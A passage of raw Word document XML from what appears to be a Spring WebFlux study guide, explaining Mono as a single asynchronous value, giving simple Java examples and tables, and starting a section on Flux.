      </w:r>
    </w:p>
    <w:p w14:paraId="16F51FA7" w14:textId="77777777" w:rsidR="00E034E7"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C41B5D0">
          <v:rect id="_x0000_i2235" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CBFABF" w14:textId="77777777" w:rsidR="00E034E7" w:rsidRPr="00372576" w:rsidRDefault="00E034E7"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2"/>
        <w:gridCol w:w="3022"/>
      </w:tblGrid>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="53E30ED5" w14:textId="77777777" w:rsidTr="00E034E7">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="305F4A41" w14:textId="77777777" w:rsidR="00E034E7" w:rsidRPr="00372576" w:rsidRDefault="00E034E7" w:rsidP="00372576">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00372576">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Aspect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52B0636C" w14:textId="77777777" w:rsidR="00E034E7" w:rsidRPr="00372576" w:rsidRDefault="00E034E7" w:rsidP="00372576">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00372576">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="4F0DCBEA" w14:textId="77777777" w:rsidTr="00E034E7">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48BCF119"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Emits</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="137A1F41"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0 or 1 item</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="31E45888" w14:textId="77777777" w:rsidTr="00E034E7">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F54BEE6"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Triggers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="512C772A"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Only on subscription</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="4E35FF9C" w14:textId="77777777" w:rsidTr="00E034E7">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20251DD1"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Thread model</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4AF5AE8C"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Non-blocking, async (Schedulers)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="6301EB16" w14:textId="77777777" w:rsidTr="00E034E7">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="089BD9D8"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Operators</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E00E299"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Rich API for transformation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="42CB6CDE" w14:textId="77777777" w:rsidTr="00E034E7">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5BA48D39"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Use cases</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52CAA291"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REST calls, DB fetch, single result</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0C12B7DF"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9FA6959">
          <v:rect id="_x0000_i2236" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4524A421" w14:textId="17992173"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489" w:name="_Toc196307969"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What type of data does Mono represent</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="489"/>
    </w:p>
    <w:p w14:paraId="75CEAF58" w14:textId="3B110BE7" w:rsidR="00E034E7" w:rsidRPr="00372576" w:rsidRDefault="00E034E7" w:rsidP="00372576">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Mono in </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring WebFlux</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> represents</w:t>
      </w:r>
      <w:r w:rsidR="008911D3" w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008911D3" w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> single asynchronous value</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (or no value at all).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1529C0ED" w14:textId="77777777" w:rsidR="00E034E7"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DFA6BED">
          <v:rect id="_x0000_i2237" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDB049C" w14:textId="77777777" w:rsidR="00E034E7" w:rsidRPr="00372576" w:rsidRDefault="00E034E7"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Details:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564CBD92"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It’s part of </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Project Reactor</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59116F44"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It implements the </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reactive Streams Publisher</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE66CC2"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It can emit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE6F4E9" w14:textId="77777777" w:rsidR="00E034E7" w:rsidRPr="00372576" w:rsidRDefault="00E034E7" w:rsidP="00372576">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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Exactly one item</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., Mono.just(data))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4E95D0" w14:textId="77777777" w:rsidR="00E034E7" w:rsidRPr="00372576" w:rsidRDefault="00E034E7" w:rsidP="00372576">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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Zero items</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., Mono.empty())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD6407A" w14:textId="77777777" w:rsidR="00E034E7" w:rsidRPr="00372576" w:rsidRDefault="00E034E7" w:rsidP="00372576">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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Or an </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>error</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Mono.error())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18746229" w14:textId="77777777" w:rsidR="00E034E7"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B0B55D0">
          <v:rect id="_x0000_i2238" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E69091" w14:textId="77777777" w:rsidR="00E034E7" w:rsidRPr="00372576" w:rsidRDefault="00E034E7"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Think of it a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1"/>
        <w:gridCol w:w="2923"/>
      </w:tblGrid>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="1C76F12C" w14:textId="77777777" w:rsidTr="00E034E7">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F44E410" w14:textId="77777777" w:rsidR="00E034E7" w:rsidRPr="00372576" w:rsidRDefault="00E034E7" w:rsidP="00372576">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00372576">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Mono Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10EE2E67" w14:textId="77777777" w:rsidR="00E034E7" w:rsidRPr="00372576" w:rsidRDefault="00E034E7" w:rsidP="00372576">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00372576">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Meaning</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="6B46E1C4" w14:textId="77777777" w:rsidTr="00E034E7">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A0EF0F7"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Mono&lt;String&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A3EEE40"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A single String value or nothing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="74E75885" w14:textId="77777777" w:rsidTr="00E034E7">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19501836"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Mono&lt;Void&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="30BD9AC6"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No value, just completion signal</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="0857B5C5" w14:textId="77777777" w:rsidTr="00E034E7">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A3BE82A"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Mono&lt;User&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17468B39"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One User object or none</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="27E4F28D" w14:textId="77777777" w:rsidR="00E034E7"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CE7E9ED">
          <v:rect id="_x0000_i2239" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1539D69A" w14:textId="77777777" w:rsidR="00E034E7" w:rsidRPr="00372576" w:rsidRDefault="00E034E7"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66EAA171"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Mono&lt;String&gt; greeting = Mono.just("Hello Siddhant!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5240618A"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Mono&lt;Object&gt; nothing = Mono.empty();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEABDC8"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Mono&lt;Object&gt; errorMono = Mono.error(new RuntimeException("Oops!"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7F628B" w14:textId="77777777" w:rsidR="00E034E7" w:rsidRPr="00372576" w:rsidRDefault="00E034E7"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So, Mono&lt;T&gt; = </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"Maybe one T, or empty/error — but never more than one."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204E5F26"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6A868CD">
          <v:rect id="_x0000_i2240" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A4F683" w14:textId="129DD076"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490" w:name="_Toc196307970"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is a Flux in Spring WebFlux</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="490"/>
    </w:p>
    <w:p w14:paraId="5BA53320" w14:textId="65A60359" w:rsidR="002951F8" w:rsidRPr="00372576" w:rsidRDefault="002951F8" w:rsidP="00372576">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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In </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring WebFlux</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, a Flux represents:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA72F3C"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A reactive stream of 0 to N asynchronous values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CBFE1F" w14:textId="77777777" w:rsidR="002951F8"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2479A612">
          <v:rect id="_x0000_i2241" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E09F56" w14:textId="77777777" w:rsidR="002951F8" w:rsidRPr="00372576" w:rsidRDefault="002951F8"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Flux Basics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4D894C"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Part of </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Project Reactor</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C990765"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Implements the </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reactive Streams Publisher</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> interface (like Mono).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BD7EEA"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Used when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BAACF3" w14:textId="77777777" w:rsidR="002951F8" w:rsidRPr="00372576" w:rsidRDefault="002951F8" w:rsidP="00372576">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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You expect </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>multiple values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3189CD3B" w14:textId="77777777" w:rsidR="002951F8" w:rsidRPr="00372576" w:rsidRDefault="002951F8" w:rsidP="00372576">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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Or even </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>none</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9319F1" w14:textId="77777777" w:rsidR="002951F8" w:rsidRPr="00372576" w:rsidRDefault="002951F8" w:rsidP="00372576">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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And it's </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-blocking/asynchronous</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C56ED4C" w14:textId="77777777" w:rsidR="002951F8"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9E4B549">
          <v:rect id="_x0000_i2242" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDA3FAB" w14:textId="77777777" w:rsidR="002951F8" w:rsidRPr="00372576" w:rsidRDefault="002951F8"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Think of it a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78"/>
        <w:gridCol w:w="2862"/>
      </w:tblGrid>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="492A45F2" w14:textId="77777777" w:rsidTr="002951F8">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
